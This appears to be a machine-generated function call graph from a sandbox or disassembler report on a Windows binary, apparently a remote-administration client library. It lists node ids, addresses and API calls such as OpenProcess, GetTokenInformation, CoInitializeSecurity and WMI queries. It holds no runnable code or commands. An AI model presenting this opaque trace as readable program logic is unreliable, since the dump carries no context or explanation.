11089857 62808->62785 62808->62787 62811 1116727d 62821 1116df04 11 API calls _fputs 62811->62821 62812 111672ae 62823 111692ef 66 API calls __getptd_noexit 62812->62823 62813->62808 62824 11169302 66 API calls __getptd_noexit 62813->62824 62817 111672cb 62825 111692ef 66 API calls __getptd_noexit 62817->62825 62819->62806 62820->62811 62821->62808 62822->62812 62823->62808 62824->62817 62825->62812 62826 111071e0 62827 111071ec 62826->62827 62828 1110721d 62827->62828 62829 111450a0 std::locale::_Init 93 API calls 62827->62829 62873 11106100 286 API calls std::locale::_Init 62828->62873 62832 11107201 62829->62832 62831 11107223 62832->62828 62836 111062e0 62832->62836 62835 11107218 62874 11163180 62836->62874 62838 111062fb LoadLibraryA 62885 11137340 285 API calls 2 library calls 62838->62885 62840 11106361 62841 11106365 62840->62841 62842 1110637d 62840->62842 62841->62842 62843 1110636a 62841->62843 62844 111450a0 std::locale::_Init 93 API calls 62842->62844 62845 11106375 62843->62845 62846 1110636e FreeLibrary 62843->62846 62847 11106386 62844->62847 62850 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62845->62850 62846->62845 62848 111063a1 LoadLibraryA GetProcAddress 62847->62848 62849 11106397 62847->62849 62851 111064d1 SetLastError 62848->62851 62861 11106443 62848->62861 62849->62848 62852 11106665 62850->62852 62853 1110660f 62851->62853 62852->62828 62852->62835 62854 111450a0 std::locale::_Init 93 API calls 62853->62854 62855 11106624 62854->62855 62856 11106635 FreeLibrary 62855->62856 62857 1110663c 62855->62857 62856->62857 62857->62845 62858 11106640 FreeLibrary 62857->62858 62858->62845 62859 111064f2 OpenProcess 62859->62861 62866 11106497 62859->62866 62860 111064a5 GetProcAddress 62863 111064de SetLastError 62860->62863 62860->62866 62861->62853 62861->62859 62861->62866 62875 11025d00 62861->62875 62863->62866 62864 111065e5 CloseHandle 62864->62853 62864->62866 62865 11081b40 std::locale::_Init IsDBCSLeadByte 62865->62866 62866->62853 62866->62859 62866->62860 62866->62861 62866->62864 62866->62865 62867 11081bb0 87 API calls 62866->62867 62868 11106556 OpenProcessToken 62866->62868 62869 11106574 GetTokenInformation 62866->62869 62870 111065d8 CloseHandle 62866->62870 62886 11106100 286 API calls std::locale::_Init 62866->62886 62887 110f5e90 25 API calls std::locale::_Init 62866->62887 62867->62866 62868->62864 62868->62866 62869->62866 62869->62870 62870->62864 62873->62831 62874->62838 62876 11025d0e GetProcAddress 62875->62876 62877 11025d1f 62875->62877 62876->62877 62878 11025d38 62877->62878 62879 11025d2c K32GetProcessImageFileNameA 62877->62879 62881 11025d3e GetProcAddress 62878->62881 62882 11025d4f 62878->62882 62879->62878 62880 11025d71 62879->62880 62880->62866 62881->62882 62883 11025d56 62882->62883 62884 11025d67 SetLastError 62882->62884 62883->62866 62884->62880 62885->62840 62886->62866 62887->62866 62888 110173f0 GetTickCount 62895 11017300 62888->62895 62893 11146450 std::locale::_Init 21 API calls 62894 11017437 62893->62894 62896 11017320 62895->62896 62897 110173d6 62895->62897 62898 11017342 CoInitialize _GetRawWMIStringW 62896->62898 62900 11017339 WaitForSingleObject 62896->62900 62899 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62897->62899 62903 11017375 62898->62903 62907 110173c2 62898->62907 62901 110173e5 62899->62901 62900->62898 62908 11017220 62901->62908 62902 110173d0 CoUninitialize 62902->62897 62904 110173bc 62903->62904 62906 11163a2d std::locale::_Init 78 API calls 62903->62906 62903->62907 62921 11163837 __fassign 62904->62921 62906->62903 62907->62897 62907->62902 62909 11017240 62908->62909 62910 110172e6 62908->62910 62911 11017258 CoInitialize _GetRawWMIStringW 62909->62911 62913 1101724f WaitForSingleObject 62909->62913 62912 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62910->62912 62914 110172d2 62911->62914 62917 1101728b 62911->62917 62915 110172f5 SetEvent GetTickCount 62912->62915 62913->62911 62914->62910 62916 110172e0 CoUninitialize 62914->62916 62915->62893 62916->62910 62917->62914 62918 110172cc 62917->62918 62920 11163a2d std::locale::_Init 78 API calls 62917->62920 62922 11163837 __fassign 62918->62922 62920->62917 62921->62907 62922->62914 62923 11025cd0 LoadLibraryA 62924 1113cd60 62925 1113cd69 62924->62925 62926 1113cd6e 62924->62926 62928 11139090 62925->62928 62929 111390d2 62928->62929 62930 111390c7 GetCurrentThreadId 62928->62930 62931 111390e0 62929->62931 63055 11029330 62929->63055 62930->62929 63062 11133920 62931->63062 62937 111391d1 62942 11139202 FindWindowA 62937->62942 62948 1113929a 62937->62948 62938 1113974a 62940 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 62938->62940 62943 11139772 62940->62943 62941 1113911c IsWindow IsWindowVisible 62944 11146450 std::locale::_Init 21 API calls 62941->62944 62945 11139217 IsWindowVisible 62942->62945 62942->62948 62943->62926 62946 11139147 62944->62946 62947 1113921e 62945->62947 62945->62948 62949 1105dd10 78 API calls 62946->62949 62947->62948 62954 11138c30 354 API calls 62947->62954 62950 1105dd10 78 API calls 62948->62950 62959 111392bf 62948->62959 62952 11139163 IsWindowVisible 62949->62952 62966 111392e7 62950->62966 62951 1105dd10 78 API calls 62960 1113945f 62951->62960 62952->62937 62955 11139171 62952->62955 62953 1113948a 62958 111394a7 62953->62958 63291 1106b860 290 API calls 62953->63291 62957 1113923f IsWindowVisible 62954->62957 62955->62937 62961 11139179 62955->62961 62956 11138c30 354 API calls 62956->62953 62957->62948 62962 1113924e IsIconic 62957->62962 62968 111394b4 62958->62968 62969 111394bd 62958->62969 62959->62951 62959->62960 62960->62953 62960->62956 62964 11146450 std::locale::_Init 21 API calls 62961->62964 62962->62948 62965 1113925f GetForegroundWindow 62962->62965 62970 11139183 GetForegroundWindow 62964->62970 63289 11131210 146 API calls 62965->63289 62966->62959 62967 11139334 62966->62967 62972 11081a70 IsDBCSLeadByte 62966->62972 62974 11143230 std::locale::_Init 8 API calls 62967->62974 63292 11131b00 89 API calls 2 library calls 62968->63292 62975 111394d4 62969->62975 62976 111394c8 62969->62976 62977 11139192 EnableWindow 62970->62977 62978 111391be 62970->62978 62972->62967 62982 11139346 62974->62982 63294 111317a0 292 API calls std::locale::_Init 62975->63294 62983 111394d9 62976->62983 62984 111394cd 62976->62984 63287 11131210 146 API calls 62977->63287 62978->62937 62987 111391ca SetForegroundWindow 62978->62987 62979 1113926e 63290 11131210 146 API calls 62979->63290 62981 111394ba 62981->62969 62989 11139353 GetLastError 62982->62989 63006 11139361 62982->63006 62991 11139599 62983->62991 62997 111394f1 62983->62997 62998 1113959b 62983->62998 63293 11131870 292 API calls std::locale::_Init 62984->63293 62987->62937 62988 11139275 62994 1113928b EnableWindow 62988->62994 63000 11139284 SetForegroundWindow 62988->63000 62995 11146450 std::locale::_Init 21 API calls 62989->62995 62993 111386b0 309 API calls 62991->62993 62992 111391a9 63288 11131210 146 API calls 62992->63288 63015 111395ee 62993->63015 62994->62948 62995->63006 62996 111394d2 62996->62983 62997->62991 63004 1110f420 std::locale::_Init 274 API calls 62997->63004 62998->62991 63300 1103f000 68 API calls 62998->63300 63000->62994 63001 111391b0 EnableWindow 63001->62978 63002 11139615 63002->62938 63017 1105dd10 78 API calls 63002->63017 63008 11139512 63004->63008 63005 111395aa 63301 1103f040 68 API calls 63005->63301 63006->62959 63007 111393b2 63006->63007 63011 11081a70 IsDBCSLeadByte 63006->63011 63009 11143230 std::locale::_Init 8 API calls 63007->63009 63012 11139544 63008->63012 63013 11139524 63008->63013 63014 111393c4 63009->63014 63011->63007 63296 1110f260 InterlockedIncrement 63012->63296 63295 110573b0 296 API calls std::locale::_Init 63013->63295 63014->62959 63019 111393cb GetLastError 63014->63019 63015->63002 63205 11142210 63015->63205 63016 111395b5 63302 1103f060 68 API calls 63016->63302 63022 11139645 63017->63022 63024 11146450 std::locale::_Init 21 API calls 63019->63024 63022->62938 63030 11139662 63022->63030 63031 1113968d 63022->63031 63023 11139533 63023->63012 63024->62959 63026 111395c0 63303 1103f020 68 API calls 63026->63303 63027 11139558 63297 1104e340 281 API calls 63027->63297 63029 111395cb 63304 1110f270 InterlockedDecrement 63029->63304 63033 1113966a 63030->63033 63034 11139699 GetTickCount 63030->63034 63031->62938 63031->63034 63036 11146450 std::locale::_Init 21 API calls 63033->63036 63034->62938 63037 111396ab 63034->63037 63039 11139675 GetTickCount 63036->63039 63040 11142e80 144 API calls 63037->63040 63038 1113956e 63298 1104e3b0 281 API calls 63038->63298 63039->62938 63042 111396b7 63040->63042 63043 11146ee0 276 API calls 63042->63043 63044 111396c2 63043->63044 63046 11142e80 144 API calls 63044->63046 63045 11139579 63045->62991 63299 110ebf30 295 API calls 63045->63299 63048 111396d5 63046->63048 63305 11025bb0 LoadLibraryA 63048->63305 63050 111396e2 63050->63050 63306 1112c7a0 GetProcAddress SetLastError 63050->63306 63052 11139729 63053 11139733 FreeLibrary 63052->63053 63054 1113973a std::ios_base::_Tidy 63052->63054 63053->63054 63054->62938 63307 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 63055->63307 63057 1102933e 63058 11029353 63057->63058 63308 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 63057->63308 63309 11089cc0 278 API calls 2 library calls 63058->63309 63061 1102935e 63061->62931 63063 11133962 63062->63063 63064 11133c84 63062->63064 63066 1105dd10 78 API calls 63063->63066 63065 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63064->63065 63068 11133c9c 63065->63068 63067 11133982 63066->63067 63067->63064 63069 1113398a GetLocalTime 63067->63069 63110 11133400 63068->63110 63070 111339c1 LoadLibraryA 63069->63070 63071 111339a0 63069->63071 63310 110098c0 LoadLibraryA 63070->63310 63072 11146450 std::locale::_Init 21 API calls 63071->63072 63074 111339b5 63072->63074 63074->63070 63075 11133a15 63311 11015c30 LoadLibraryA 63075->63311 63077 11133a20 GetCurrentProcess 63078 11133a45 GetProcAddress 63077->63078 63079 11133a5d GetProcessHandleCount 63077->63079 63078->63079 63080 11133a66 SetLastError 63078->63080 63081 11133a6e 63079->63081 63080->63081 63082 11133a92 63081->63082 63083 11133a78 GetProcAddress 63081->63083 63085 11133aa0 GetProcAddress 63082->63085 63086 11133aba 63082->63086 63083->63082 63084 11133ac7 SetLastError 63083->63084 63084->63085 63085->63086 63087 11133ad4 SetLastError 63085->63087 63088 11133adf GetProcAddress 63086->63088 63087->63088 63089 11133af1 K32GetProcessMemoryInfo 63088->63089 63090 11133aff SetLastError 63088->63090 63091 11133b07 63089->63091 63090->63091 63092 11146450 std::locale::_Init 21 API calls 63091->63092 63096 11133b7d 63091->63096 63092->63096 63093 11133c5a 63094 11133c6a FreeLibrary 63093->63094 63095 11133c6d 63093->63095 63094->63095 63097 11133c77 FreeLibrary 63095->63097 63098 11133c7a 63095->63098 63096->63093 63100 1105dd10 78 API calls 63096->63100 63097->63098 63098->63064 63099 11133c81 FreeLibrary 63098->63099 63099->63064 63101 11133bce 63100->63101 63102 1105dd10 78 API calls 63101->63102 63103 11133bf6 63102->63103 63104 1105dd10 78 API calls 63103->63104 63105 11133c1d 63104->63105 63106 1105dd10 78 API calls 63105->63106 63107 11133c44 63106->63107 63107->63093 63108 11133c55 63107->63108 63312 11027780 274 API calls 2 library calls 63108->63312 63112 1113342d 63110->63112 63111 111338e9 63111->62937 63111->62938 63209 11138c30 63111->63209 63112->63111 63113 110d1550 274 API calls 63112->63113 63114 1113348e 63113->63114 63115 110d1550 274 API calls 63114->63115 63116 11133499 63115->63116 63117 111334c7 63116->63117 63118 111334de 63116->63118 63313 11029450 274 API calls 2 library calls 63117->63313 63120 11146450 std::locale::_Init 21 API calls 63118->63120 63122 111334ec 63120->63122 63123 11133505 63122->63123 63124 1113351c 63122->63124 63314 11029450 274 API calls 2 library calls 63123->63314 63126 11081bb0 87 API calls 63124->63126 63128 1113352a 63126->63128 63129 11133541 63128->63129 63315 11009450 274 API calls std::locale::_Init 63128->63315 63131 11146450 std::locale::_Init 21 API calls 63129->63131 63135 111335e5 63129->63135 63133 11133556 63131->63133 63132 1113353b 63134 11081a70 IsDBCSLeadByte 63132->63134 63133->63135 63137 11146450 std::locale::_Init 21 API calls 63133->63137 63134->63129 63136 11146450 std::locale::_Init 21 API calls 63135->63136 63149 1113368e 63135->63149 63146 111335f7 63136->63146 63138 11133580 63137->63138 63316 110ed7a0 RegCloseKey 63138->63316 63140 11133598 63317 110ed430 276 API calls 3 library calls 63140->63317 63141 110ed1a0 2 API calls 63141->63146 63143 111335a9 63318 1102a0b0 274 API calls std::locale::_Init 63143->63318 63146->63141 63148 1113365b 63146->63148 63146->63149 63320 110ed430 276 API calls 3 library calls 63146->63320 63147 111335b3 63150 11146450 std::locale::_Init 21 API calls 63147->63150 63151 111335ca 63147->63151 63148->63146 63321 11029450 274 API calls 2 library calls 63148->63321 63153 111336c1 63149->63153 63154 111336aa 63149->63154 63150->63151 63151->63135 63319 1102a0b0 274 API calls std::locale::_Init 63151->63319 63158 111336be 63153->63158 63160 111336ec 63153->63160 63163 11133734 63153->63163 63322 11029450 274 API calls 2 library calls 63154->63322 63157 111337cc 63166 11133816 63157->63166 63167 111337ff 63157->63167 63158->63153 63323 11029450 274 API calls 2 library calls 63158->63323 63159 11133779 63159->63157 63161 11162be5 _free 66 API calls 63159->63161 63164 11081b40 std::locale::_Init IsDBCSLeadByte 63160->63164 63165 1113378b 63161->63165 63163->63157 63163->63159 63169 11133752 63163->63169 63170 11133769 63163->63170 63171 111336f7 63164->63171 63179 111337b3 63165->63179 63180 1113379c 63165->63180 63176 11133813 63166->63176 63183 11133845 63166->63183 63196 111338a1 63166->63196 63328 11029450 274 API calls 2 library calls 63167->63328 63326 11029450 274 API calls 2 library calls 63169->63326 63174 11081bb0 87 API calls 63170->63174 63171->63163 63189 11133725 63171->63189 63190 1113370e 63171->63190 63174->63159 63175 110d07c0 274 API calls 63178 111338da 63175->63178 63176->63166 63329 11029450 274 API calls 2 library calls 63176->63329 63184 110d07c0 274 API calls 63178->63184 63182 11163cf8 __strdup 66 API calls 63179->63182 63327 11029450 274 API calls 2 library calls 63180->63327 63186 111337bc 63182->63186 63188 11081bb0 87 API calls 63183->63188 63184->63111 63191 11146450 std::locale::_Init 21 API calls 63186->63191 63193 11133853 63188->63193 63325 110d0800 274 API calls 2 library calls 63189->63325 63324 11029450 274 API calls 2 library calls 63190->63324 63191->63157 63193->63196 63198 11133868 63193->63198 63199 1113387f 63193->63199 63196->63175 63330 11029450 274 API calls 2 library calls 63198->63330 63200 11081a70 IsDBCSLeadByte 63199->63200 63202 1113388a 63200->63202 63202->63196 63331 11009450 274 API calls std::locale::_Init 63202->63331 63206 1114222f 63205->63206 63207 1114221a 63205->63207 63206->63002 63332 11141890 63207->63332 63210 1113906f 63209->63210 63213 11138c4d 63209->63213 63211 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63210->63211 63212 1113907e 63211->63212 63212->62941 63213->63210 63214 111450a0 std::locale::_Init 93 API calls 63213->63214 63215 11138c8c 63214->63215 63215->63210 63216 1105dd10 78 API calls 63215->63216 63217 11138cbb 63216->63217 63464 1112c920 63217->63464 63219 11138e00 PostMessageA 63221 11138e15 63219->63221 63220 1105dd10 78 API calls 63222 11138dfc 63220->63222 63223 11138e25 63221->63223 63473 1110f270 InterlockedDecrement 63221->63473 63222->63219 63222->63221 63225 11138e2b 63223->63225 63226 11138e4d 63223->63226 63229 11138e83 std::ios_base::_Tidy 63225->63229 63230 11138e9e 63225->63230 63474 11130410 296 API calls std::locale::_Init 63226->63474 63228 11138e55 63475 1112cb20 SetDlgItemTextA 63228->63475 63236 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63229->63236 63232 11142e80 144 API calls 63230->63232 63233 11138ea3 63232->63233 63234 11146ee0 276 API calls 63233->63234 63237 11138eaa SetWindowTextA 63234->63237 63239 11138e9a 63236->63239 63240 11138ec6 63237->63240 63248 11138ecd std::ios_base::_Tidy 63237->63248 63238 11138e70 std::ios_base::_Tidy 63238->63225 63239->62941 63476 111352b0 306 API calls 5 library calls 63240->63476 63241 11145b40 280 API calls 63243 11138dab 63241->63243 63243->63219 63243->63220 63244 11138f24 63245 11138f38 63244->63245 63246 11138ffc 63244->63246 63250 11138f5c 63245->63250 63479 111352b0 306 API calls 5 library calls 63245->63479 63252 1113901d 63246->63252 63253 1113900b 63246->63253 63254 11139004 63246->63254 63247 11138ef7 63247->63244 63249 11138f0c 63247->63249 63248->63244 63248->63247 63477 111352b0 306 API calls 5 library calls 63248->63477 63478 11131210 146 API calls 63249->63478 63481 110f8640 88 API calls 63250->63481 63485 110f8640 88 API calls 63252->63485 63484 11131210 146 API calls 63253->63484 63483 111352b0 306 API calls 5 library calls 63254->63483 63259 11138f1c 63259->63244 63262 11139028 63262->63210 63267 1113902c IsWindowVisible 63262->63267 63263 11138f67 63263->63210 63264 11138f6f IsWindowVisible 63263->63264 63264->63210 63268 11138f86 63264->63268 63265 1113901a 63265->63252 63266 11138f46 63266->63250 63269 11138f52 63266->63269 63267->63210 63270 1113903e IsWindowVisible 63267->63270 63271 111450a0 std::locale::_Init 93 API calls 63268->63271 63480 11131210 146 API calls 63269->63480 63270->63210 63273 1113904b EnableWindow 63270->63273 63274 11138f91 63271->63274 63486 11131210 146 API calls 63273->63486 63274->63210 63277 11138f9c GetForegroundWindow IsWindowVisible 63274->63277 63275 11138f59 63275->63250 63279 11138fc1 63277->63279 63280 11138fb6 EnableWindow 63277->63280 63278 11139062 EnableWindow 63278->63210 63482 11131210 146 API calls 63279->63482 63280->63279 63282 11138fc8 63283 11138fde EnableWindow 63282->63283 63284 11138fd7 SetForegroundWindow 63282->63284 63285 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63283->63285 63284->63283 63286 11138ff8 63285->63286 63286->62941 63287->62992 63288->63001 63289->62979 63290->62988 63291->62958 63292->62981 63293->62996 63294->62983 63295->63023 63296->63027 63297->63038 63298->63045 63299->62991 63300->63005 63301->63016 63302->63026 63303->63029 63304->62991 63305->63050 63306->63052 63307->63057 63308->63057 63309->63061 63310->63075 63311->63077 63312->63093 63315->63132 63316->63140 63317->63143 63318->63147 63319->63135 63320->63146 63325->63163 63331->63196 63333 111418cf 63332->63333 63334 111418c8 std::ios_base::_Tidy 63332->63334 63335 1110f420 std::locale::_Init 274 API calls 63333->63335 63336 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63334->63336 63338 111418d6 63335->63338 63337 1114220a 63336->63337 63337->63206 63339 11061700 96 API calls 63338->63339 63340 11141942 63339->63340 63341 11141949 RegCloseKey 63340->63341 63342 11141950 63340->63342 63341->63342 63343 11143230 std::locale::_Init 8 API calls 63342->63343 63344 11141980 63343->63344 63345 11141997 63344->63345 63347 11062d60 318 API calls 63344->63347 63346 1110f420 std::locale::_Init 274 API calls 63345->63346 63348 1114199e 63346->63348 63347->63345 63349 111419ba 63348->63349 63449 11060be0 280 API calls std::locale::_Init 63348->63449 63351 1110f420 std::locale::_Init 274 API calls 63349->63351 63352 111419d3 63351->63352 63353 111419ef 63352->63353 63450 11060be0 280 API calls std::locale::_Init 63352->63450 63355 1110f420 std::locale::_Init 274 API calls 63353->63355 63356 11141a08 63355->63356 63357 11141a24 63356->63357 63451 11060be0 280 API calls std::locale::_Init 63356->63451 63359 11060760 277 API calls 63357->63359 63360 11141a4d 63359->63360 63361 11060760 277 API calls 63360->63361 63396 11141a67 63361->63396 63362 11141d95 63364 110d1550 274 API calls 63362->63364 63367 11142179 63362->63367 63363 110607f0 283 API calls 63363->63396 63365 11141db3 63364->63365 63369 1105dd10 78 API calls 63365->63369 63366 11141d85 63368 11146450 std::locale::_Init 21 API calls 63366->63368 63462 11060640 69 API calls std::ios_base::_Tidy 63367->63462 63368->63362 63371 11141df0 63369->63371 63370 11146450 21 API calls std::locale::_Init 63370->63396 63374 11060760 277 API calls 63371->63374 63378 11141f3d 63371->63378 63373 111421d2 63463 11060640 69 API calls std::ios_base::_Tidy 63373->63463 63376 11141e0e 63374->63376 63377 110607f0 283 API calls 63376->63377 63384 11141e1d 63377->63384 63455 110679c0 290 API calls std::locale::_Init 63378->63455 63379 11141e52 63382 11060760 277 API calls 63379->63382 63381 11146450 std::locale::_Init 21 API calls 63381->63384 63385 11141e68 63382->63385 63383 11141f83 63386 11141fb3 EnterCriticalSection 63383->63386 63394 11141f87 63383->63394 63384->63379 63384->63381 63389 110607f0 283 API calls 63384->63389 63390 110607f0 283 API calls 63385->63390 63388 11060420 280 API calls 63386->63388 63387 111319f0 87 API calls 63387->63396 63401 11141fd0 63388->63401 63389->63384 63404 11141e78 63390->63404 63392 11081c60 88 API calls std::locale::_Init 63392->63396 63393 11141eb1 63397 11060760 277 API calls 63393->63397 63394->63386 63456 110508e0 353 API calls 4 library calls 63394->63456 63457 110679c0 290 API calls std::locale::_Init 63394->63457 63395 11081bb0 87 API calls 63395->63396 63396->63362 63396->63363 63396->63366 63396->63370 63396->63387 63396->63392 63396->63395 63399 11141ec7 63397->63399 63398 11146450 std::locale::_Init 21 API calls 63398->63404 63406 110607f0 283 API calls 63399->63406 63400 11141ffa LeaveCriticalSection 63402 1114204e 63400->63402 63403 1114200e 63400->63403 63401->63400 63407 1102a9f0 289 API calls 63401->63407 63409 11133400 278 API calls 63402->63409 63403->63402 63412 11146450 std::locale::_Init 21 API calls 63403->63412 63404->63393 63404->63398 63408 110607f0 283 API calls 63404->63408 63423 11141ed6 63406->63423 63410 11141ff7 63407->63410 63408->63404 63411 11142058 63409->63411 63410->63400 63414 110d1550 274 API calls 63411->63414 63416 1114201c 63412->63416 63413 11141f11 63452 11060640 69 API calls std::ios_base::_Tidy 63413->63452 63417 11142066 63414->63417 63419 1113cc30 309 API calls 63416->63419 63458 110cff20 274 API calls std::locale::_Init 63417->63458 63418 11141f1f 63453 11060640 69 API calls std::ios_base::_Tidy 63418->63453 63422 11142021 63419->63422 63420 11146450 std::locale::_Init 21 API calls 63420->63423 63426 111414a0 968 API calls 63422->63426 63423->63413 63423->63420 63424 110607f0 283 API calls 63423->63424 63424->63423 63425 11141f2e 63454 11060640 69 API calls std::ios_base::_Tidy 63425->63454 63429 11142027 63426->63429 63429->63402 63430 11146450 std::locale::_Init 21 API calls 63429->63430 63432 11142040 63430->63432 63431 110d07c0 274 API calls 63433 1114215b 63431->63433 63435 11026ba0 406 API calls 63432->63435 63436 110d07c0 274 API calls 63433->63436 63434 1114209c 63437 111420c3 63434->63437 63438 111420da 63434->63438 63443 1114211f 63434->63443 63435->63402 63436->63367 63459 11029450 274 API calls 2 library calls 63437->63459 63439 11081bb0 87 API calls 63438->63439 63441 111420eb 63439->63441 63441->63443 63460 11009450 274 API calls std::locale::_Init 63441->63460 63443->63431 63445 111420ff 63446 11081a70 IsDBCSLeadByte 63445->63446 63447 11142105 63446->63447 63447->63443 63461 11009450 274 API calls std::locale::_Init 63447->63461 63449->63349 63450->63353 63451->63357 63452->63418 63453->63425 63454->63378 63455->63383 63456->63394 63457->63394 63458->63434 63460->63445 63461->63443 63462->63373 63463->63334 63465 1112c93c 63464->63465 63466 1112c977 63465->63466 63467 1112c964 63465->63467 63487 1106b860 290 API calls 63466->63487 63469 11146ee0 276 API calls 63467->63469 63470 1112c96f 63469->63470 63471 1112c9c3 63470->63471 63472 11142290 std::locale::_Init 274 API calls 63470->63472 63471->63241 63471->63243 63472->63471 63473->63223 63474->63228 63475->63238 63476->63248 63477->63247 63478->63259 63479->63266 63480->63275 63481->63263 63482->63282 63483->63253 63484->63265 63485->63262 63486->63278 63487->63470 63488 11144200 63489 11144211 63488->63489 63502 11143c20 63489->63502 63493 11144295 63496 111442b2 63493->63496 63498 11144294 63493->63498 63494 1114425b 63495 11144262 ResetEvent 63494->63495 63510 11143de0 274 API calls 2 library calls 63495->63510 63498->63493 63511 11143de0 274 API calls 2 library calls 63498->63511 63500 11144276 SetEvent WaitForMultipleObjects 63500->63495 63500->63498 63501 111442af 63501->63496 63503 11143c2c GetCurrentProcess 63502->63503 63504 11143c4f 63502->63504 63503->63504 63505 11143c3d GetModuleFileNameA 63503->63505 63506 11143c79 WaitForMultipleObjects 63504->63506 63507 1110f420 std::locale::_Init 272 API calls 63504->63507 63505->63504 63506->63493 63506->63494 63508 11143c6b 63507->63508 63508->63506 63512 11143570 GetModuleFileNameA 63508->63512 63510->63500 63511->63501 63513 111435f3 63512->63513 63514 111435b3 63512->63514 63517 111435ff LoadLibraryA 63513->63517 63518 11143619 GetModuleHandleA GetProcAddress 63513->63518 63515 11081b40 std::locale::_Init IsDBCSLeadByte 63514->63515 63516 111435c1 63515->63516 63516->63513 63521 111435c8 LoadLibraryA 63516->63521 63517->63518 63522 1114360e LoadLibraryA 63517->63522 63519 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 63518->63519 63520 11143639 63518->63520 63523 11143673 10 API calls 63519->63523 63520->63523 63521->63513 63522->63518 63524 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63523->63524 63525 111436f0 63524->63525 63525->63506 63526 1115bde0 63527 1115bdf4 63526->63527 63528 1115bdec 63526->63528 63538 111631ab 63527->63538 63530 1115be14 63532 1115bf40 63534 11162be5 _free 66 API calls 63532->63534 63535 1115bf68 63534->63535 63536 1115be31 63536->63532 63537 1115bf24 SetLastError 63536->63537 63537->63536 63539 11170166 __calloc_crt 66 API calls 63538->63539 63540 111631c5 63539->63540 63544 1115be08 63540->63544 63562 111692ef 66 API calls __getptd_noexit 63540->63562 63542 111631d8 63542->63544 63563 111692ef 66 API calls __getptd_noexit 63542->63563 63544->63530 63544->63532 63545 1115ba20 CoInitializeSecurity CoCreateInstance 63544->63545 63546 1115ba95 wsprintfW SysAllocString 63545->63546 63547 1115bc14 63545->63547 63552 1115badb 63546->63552 63548 11161d01 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63547->63548 63550 1115bc40 63548->63550 63549 1115bc01 SysFreeString 63549->63547 63550->63536 63551 1115bbe9 63551->63549 63552->63549 63552->63551 63552->63552 63553 1115bb6c 63552->63553 63554 1115bb5a wsprintfW 63552->63554 63564 110974a0 63553->63564 63554->63553 63556 1115bb7e 63557 110974a0 275 API calls 63556->63557 63558 1115bb93 63557->63558 63569 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 63558->63569 63560 1115bbd7 63570 11097550 InterlockedDecrement SysFreeString std::ios_base::_Tidy 63560->63570 63562->63542 63563->63544 63565 1110f420 std::locale::_Init 274 API calls 63564->63565 63566 110974d3 63565->63566 63567 110974e6 SysAllocString 63566->63567 63568 11097504 63566->63568 63567->63568 63568->63556 63569->63560 63570->63551 63571 1116970d 63572 1116971d 63571->63572 63573 11169718 63571->63573 63577 11169617 63572->63577 63589 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 63573->63589 63576 1116972b 63578 11169623 _fputs 63577->63578 63579 11169670 63578->63579 63582 111696c0 _fputs 63578->63582 63590 111694b3 63578->63590 63579->63582 63637 11025e20 7 API calls ___DllMainCRTStartup 63579->63637 63581 11169683 63588 111696a0 63581->63588 63638 11025e20 7 API calls ___DllMainCRTStartup 63581->63638 63582->63576 63585 111694b3 __CRT_INIT@12 117 API calls 63585->63582 63586 11169697 63587 111694b3 __CRT_INIT@12 117 API calls 63586->63587 63587->63588 63588->63582 63588->63585 63589->63572 63591 111694bf _fputs 63590->63591 63592 111694c7 63591->63592 63593 11169541 63591->63593 63639 1116d4d0 HeapCreate 63592->63639 63595 11169547 63593->63595 63596 111695a2 63593->63596 63600 11169565 63595->63600 63604 111694d0 _fputs 63595->63604 63685 1116d79b 66 API calls _doexit 63595->63685 63598 111695a7 63596->63598 63599 11169600 63596->63599 63597 111694cc 63597->63604 63640 1116b96c GetModuleHandleW 63597->63640 63601 1116b5fa ___set_flsgetvalue 3 API calls 63598->63601 63599->63604 63691 1116b8fe 80 API calls __freefls@4 63599->63691 63605 11169579 63600->63605 63686 1117140e 67 API calls _free 63600->63686 63602 111695ac 63601->63602 63608 11169dbe __calloc_crt 66 API calls 63602->63608 63604->63579 63689 1116958c 70 API calls __mtterm 63605->63689 63611 111695b8 63608->63611 63611->63604 63615 111695c4 DecodePointer 63611->63615 63612 1116956f 63687 1116b64b 70 API calls _free 63612->63687 63613 111694dc __RTC_Initialize 63614 111694e0 63613->63614 63619 111694ec GetCommandLineA ___crtGetEnvironmentStringsA 63613->63619 63682 1116d4ee HeapDestroy 63614->63682 63621 111695d9 63615->63621 63618 11169574 63688 1116d4ee HeapDestroy 63618->63688 63665 111711c9 GetStartupInfoW 63619->63665 63624 111695f4 63621->63624 63625 111695dd 63621->63625 63629 11162be5 _free 66 API calls 63624->63629 63690 1116b688 66 API calls 4 library calls 63625->63690 63626 11169511 __setargv 63631 1116952a 63626->63631 63632 1116951a __setenvp 63626->63632 63627 1116950a 63683 1116b64b 70 API calls _free 63627->63683 63629->63604 63631->63604 63684 1117140e 67 API calls _free 63631->63684 63632->63631 63634 11169523 63632->63634 63633 111695e4 GetCurrentThreadId 63633->63604 63678 1116d5ae 63634->63678 63637->63581 63638->63586 63639->63597 63641 1116b980 63640->63641 63642 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 63640->63642 63692 1116b64b 70 API calls _free 63641->63692 63644 1116b9d3 TlsAlloc 63642->63644 63647 1116bae2 63644->63647 63648 1116ba21 TlsSetValue 63644->63648 63646 1116b985 63646->63613 63647->63613 